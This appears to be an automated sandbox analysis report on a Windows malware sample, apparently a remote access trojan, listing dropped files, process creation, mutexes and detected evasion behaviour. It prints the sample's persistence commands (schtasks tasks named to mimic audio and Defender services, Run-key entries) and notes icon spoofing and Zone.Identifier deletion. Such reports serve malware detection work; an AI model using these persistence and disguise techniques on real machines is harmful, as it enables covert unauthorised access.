Source: CVbJSUXraQ.exe	ReversingLabs: Detection: 86%

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

File read: C:\Users\user\Desktop\CVbJSUXraQ.exe

Jump to behavior

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\CVbJSUXraQ.exe 'C:\Users\user\Desktop\CVbJSUXraQ.exe'
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Users\user\Desktop\CVbJSUXraQ.exe C:\Users\user\Desktop\CVbJSUXraQ.exe
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\btpanui\SystemPropertiesPerformance.exe C:\Users\user\btpanui\SystemPropertiesPerformance.exe
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks' /create /tn 'win defender run' /sc ONLOGON /tr 'C:\Users\user\AppData\Local\Temp\windef.exe' /rl HIGHEST /f
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process created: C:\Users\user\AppData\Roaming\SubDir\winsock.exe C:\Users\user\AppData\Roaming\SubDir\winsock.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\windef.exe C:\Users\user\AppData\Local\Temp\windef.exe
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks' /create /tn 'win defender run' /sc ONLOGON /tr 'C:\Users\user\AppData\Roaming\SubDir\winsock.exe' /rl HIGHEST /f
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Users\user\btpanui\SystemPropertiesPerformance.exe C:\Users\user\btpanui\SystemPropertiesPerformance.exe
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Users\user\Desktop\CVbJSUXraQ.exe C:\Users\user\Desktop\CVbJSUXraQ.exe
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks' /create /tn 'win defender run' /sc ONLOGON /tr 'C:\Users\user\AppData\Local\Temp\windef.exe' /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process created: C:\Users\user\AppData\Roaming\SubDir\winsock.exe C:\Users\user\AppData\Roaming\SubDir\winsock.exe
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Users\user\btpanui\SystemPropertiesPerformance.exe C:\Users\user\btpanui\SystemPropertiesPerformance.exe
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

File created: C:\Users\user\AppData\Local\Temp\vnc.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\windef.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00E13C55 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,

Source: winsock.exe.6.dr, ??uf70a????ue511ue157??uec43ue3d6???u2a79??uf0d6.cs	Base64 encoded string: 'oIIRNa+RdIwW+qaBULzt1DUcxpjlz0HNdN7K1cLb4jQThGkGX88S8hX6tdF7p9CzQ/6QHXnWqrx4b/nIZ3FJXA==', 'QbMzDPpqqUXstevFR58fKA0Jr+e3jVtCkhoKVPhySmaFNMTJp1ppj/Kt0w5lWPuTqkKvCiwMGvqLQtAHqp/17s/0tIGcigHxTkcio6g+yX4aTA0D6g6rgIBwSbettKev', 'iwb/FVEFSrvXyRpBxbtrAvdMlxa7+ov04yp0i3czHSu4tv1s4GZ3EJzmAGkSQNOaN8kB3o9RFUbfJZJcB+hSpA==', 'lhs5124+CoNVKqRqKICGyr7DRe4uuuc1FLOEmOGHA7APoV7jgwYZxWM4M5pEtojmeyNbOwwMXfB8DTqa3KrHaQ==', 'plRSbnRAYEQD5L8YxtmTiGxc90fTxUBQapXZHFYTfMfDL8U0L0qqFBNRQNSpPeLR3w4wTg+tkb/s4reeumXm1A=='
Source: 6.0.windef.exe.f10000.0.unpack, ??uf70a????ue511ue157??uec43ue3d6???u2a79??uf0d6.cs	Base64 encoded string: 'oIIRNa+RdIwW+qaBULzt1DUcxpjlz0HNdN7K1cLb4jQThGkGX88S8hX6tdF7p9CzQ/6QHXnWqrx4b/nIZ3FJXA==', 'QbMzDPpqqUXstevFR58fKA0Jr+e3jVtCkhoKVPhySmaFNMTJp1ppj/Kt0w5lWPuTqkKvCiwMGvqLQtAHqp/17s/0tIGcigHxTkcio6g+yX4aTA0D6g6rgIBwSbettKev', 'iwb/FVEFSrvXyRpBxbtrAvdMlxa7+ov04yp0i3czHSu4tv1s4GZ3EJzmAGkSQNOaN8kB3o9RFUbfJZJcB+hSpA==', 'lhs5124+CoNVKqRqKICGyr7DRe4uuuc1FLOEmOGHA7APoV7jgwYZxWM4M5pEtojmeyNbOwwMXfB8DTqa3KrHaQ==', 'plRSbnRAYEQD5L8YxtmTiGxc90fTxUBQapXZHFYTfMfDL8U0L0qqFBNRQNSpPeLR3w4wTg+tkb/s4reeumXm1A=='
Source: 6.2.windef.exe.f10000.0.unpack, ??uf70a????ue511ue157??uec43ue3d6???u2a79??uf0d6.cs	Base64 encoded string: 'oIIRNa+RdIwW+qaBULzt1DUcxpjlz0HNdN7K1cLb4jQThGkGX88S8hX6tdF7p9CzQ/6QHXnWqrx4b/nIZ3FJXA==', 'QbMzDPpqqUXstevFR58fKA0Jr+e3jVtCkhoKVPhySmaFNMTJp1ppj/Kt0w5lWPuTqkKvCiwMGvqLQtAHqp/17s/0tIGcigHxTkcio6g+yX4aTA0D6g6rgIBwSbettKev', 'iwb/FVEFSrvXyRpBxbtrAvdMlxa7+ov04yp0i3czHSu4tv1s4GZ3EJzmAGkSQNOaN8kB3o9RFUbfJZJcB+hSpA==', 'lhs5124+CoNVKqRqKICGyr7DRe4uuuc1FLOEmOGHA7APoV7jgwYZxWM4M5pEtojmeyNbOwwMXfB8DTqa3KrHaQ==', 'plRSbnRAYEQD5L8YxtmTiGxc90fTxUBQapXZHFYTfMfDL8U0L0qqFBNRQNSpPeLR3w4wTg+tkb/s4reeumXm1A=='

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Mutant created: \Sessions\1\BaseNamedObjects\runas
Source: C:\Windows\System32\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{41435A30-AC43-1BEB-BE05-A07FD209D423}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_01
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Mutant created: \Sessions\1\BaseNamedObjects\AE86A6D5-F9414907-A8AD8678-FDF622E2-FED71C3E8
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Mutant created: \Sessions\1\BaseNamedObjects\QSR_MUTEX_0kBRNrRz5TDLEQouI0

Source: C:\Users\user\AppData\Local\Temp\windef.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: CVbJSUXraQ.exe

Static file information: File size 2111264 > 1048576

Source: CVbJSUXraQ.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x13a800

Source: CVbJSUXraQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: CVbJSUXraQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: CVbJSUXraQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: CVbJSUXraQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: CVbJSUXraQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: CVbJSUXraQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: CVbJSUXraQ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: ntdll.pdb source: vnc.exe, 00000004.00000003.715734553.0000000003530000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: vnc.exe, 00000004.00000003.715734553.0000000003530000.00000004.00000001.sdmp

Source: CVbJSUXraQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: CVbJSUXraQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: CVbJSUXraQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: CVbJSUXraQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: CVbJSUXraQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DD8945 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AB103B push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00ABE0BC push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00ADEAA9 push cs; iretd
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00ADEA73 push cs; ret
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00ADE3DD push es; iretd
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00CA2D0C push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Code function: 6_2_00F125B2 push esi; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DD8945 push ecx; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DC4257 push edi; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DC426B push edi; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0041A068 push 0041A08Eh; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0041A02C push 0041A05Ch; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040E8D0 push 0040E905h; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040B164 push 0040B190h; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040E908 push 0040E94Ah; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040B12C push 0040B158h; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040C136 push 0040C164h; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040C138 push 0040C164h; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040813C push 00408174h; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_004171E8 push 00417214h; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040C9EA push 0040CA18h; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040C9EC push 0040CA18h; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040E1A4 push 0040E1D0h; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040B1B8 push 0040B1E4h; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040E25A push 0040E288h; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040E25C push 0040E288h; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00414A28 push 00414A84h; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040BAB8 push 0040BAE4h; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00409B54 push 00409BC8h; ret
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00409B78 push 00409BC8h; ret

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DB4B37 LoadLibraryA,GetProcAddress,

Source: windef.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x60aad
Source: SystemPropertiesPerformance.exe.1.dr	Static PE information: real checksum: 0x110ada should be: 0x208fb2
Source: winsock.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x60aad
Source: vnc.exe.10.dr	Static PE information: real checksum: 0x0 should be: 0x657b3
Source: CVbJSUXraQ.exe	Static PE information: real checksum: 0x110ada should be: 0x209217
Source: vnc.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x657b3

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	File created: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Jump to dropped file
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	File created: C:\Users\user\AppData\Local\Temp\vnc.exe
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	File created: C:\Users\user\AppData\Local\Temp\windef.exe
Source: C:\Users\user\AppData\Local\Temp\windef.exe	File created: C:\Users\user\AppData\Roaming\SubDir\winsock.exe	Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F

Source: C:\Users\user\AppData\Local\Temp\windef.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run win defender run			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run win defender run			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Show sources

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: download (31).png

Uses known network protocols on non-standard ports

Show sources

Source: unknown

Network traffic detected: HTTP traffic on port 49743 -> 8000

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\AppData\Local\Temp\windef.exe	File opened: C:\Users\user\AppData\Local\Temp\windef.exe:Zone.Identifier read attributes \| delete
Source: C:\Users\user\AppData\Local\Temp\windef.exe	File opened: C:\Users\user\AppData\Roaming\SubDir\winsock.exe:Zone.Identifier read attributes \| delete

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DB48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C83CC0 IsIconic,GetLastActivePopup,OpenClipboard,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,CloseClipboard,
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C8143C IsIconic,GetLastActivePopup,
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C821C8 IsIconic,
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C7CDE8 IsIconic,memset,GetWindow,GetWindow,
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C7B764 GetWindowLongPtrA,IsIconic,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DB48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A448D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 7_2_00DD3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\AppData\Local\Temp\windef.exe TID: 4128	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\windef.exe TID: 5872	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\windef.exe

Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\windef.exe

Thread delayed: delay time: 922337203685477

Source: SystemPropertiesPerformance.exe, 0000000A.00000002.941562165.00000000017DC000.00000004.00000001.sdmp	Binary or memory string: vmtoolsd.exe
Source: svchost.exe, 00000005.00000000.720666690.0000020DCBE1F000.00000004.00000001.sdmp, windef.exe, 00000006.00000002.720199755.0000000005849000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DB49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00E1445A GetFileAttributesW,FindFirstFileW,FindClose,
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C7FDA0 memset,lstrlenW,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,lstrcatW,memset,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,lstrcpyW,lstrcatW,lstrcatW,memset,RemoveDirectoryW,
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C76554 memset,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,memset,FindFirstFileW,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,SetLastError,FindNextFileW,FindClose,SetLastError,
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C7FFA8 memset,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,lstrlenW,HeapAlloc,lstrcpyW,CreateDirectoryW,GetLastError,FindFirstFileW,GetLastError,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,HeapFree,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00E1445A GetFileAttributesW,FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00413030 FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_004119A8 FindFirstFileW,FindNextFileW,FindClose,
